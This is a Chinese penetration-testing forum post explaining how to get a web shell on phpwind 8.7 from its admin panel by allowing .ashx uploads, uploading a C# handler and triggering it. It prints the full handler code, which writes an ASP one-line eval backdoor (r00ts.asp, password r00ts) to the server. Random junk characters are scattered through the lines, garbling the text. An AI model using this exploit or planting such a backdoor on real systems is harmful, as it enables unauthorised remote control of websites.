找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpwind 8.7 后台拿shell
返回列表 发新帖
查看: 3354|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
0 v0 j5 c& @6 {2 K+ ?9 A! d# R' M4 r
* i1 X4 v$ s* _群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
4 D) h; f/ q# O3 o  F. u& }, M! e ( P1 L* I$ E8 \( Y; n- A, h  ^
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整5 U! N# x, V7 t( }
5 C# @' Z! C3 b1 f0 p) i  W5 p. X
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx5 @/ F# g+ C; @
9 ^( H6 G  W; J3 V* x; G: y- c
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts# T2 f: h3 i3 `+ W( P" c

) k" {- ^8 H7 J下面是代码:% f+ o. Q8 V& }( d- p" p
! F/ h9 l( e' F5 z, z
<%@ WebHandler Language="C#"Class="Handler" %>( O) Y1 |8 q$ f
using System;
0 A, ], `) Q$ a/ i8 l) N7 busing System.Web;
8 K  M$ r4 Q  S: Vusing System.IO;
( q2 l: P. C- }% M4 h# @# dpublic class Handler : IHttpHandler {
2 I* j7 m1 k4 r" J! vpublic void ProcessRequest (HttpContext context) {5 C# t& r( h' J1 N0 H
context.Response.ContentType = "text/plain";8 S! ]5 G. z9 Z4 ~0 t
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));! O2 Q1 L( s/ q: Q8 @8 K: P
file1.Write("<%eval request(\"r00ts\")%>");
. d' P+ P3 A! u8 j- b" B4 L5 |1 X' Vfile1.Flush();
6 M# e0 n! q( R5 h1 tfile1.Close();
& Q3 N& F5 P* y  T2 t% b}. K8 `5 I( R6 P) O0 [
public bool IsReusable {6 p: w- C. @# s. e9 m4 k4 q
get {
: S. _4 U0 T% F& q1 p4 Areturn false;
5 l/ d' a+ b: x; c5 K9 J  \& _/ X}3 |0 G0 i; s# R$ [! U
}
- v* M0 Q5 _& K+ F. {1 Q}
. r- c' D# Z- v$ M3 x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表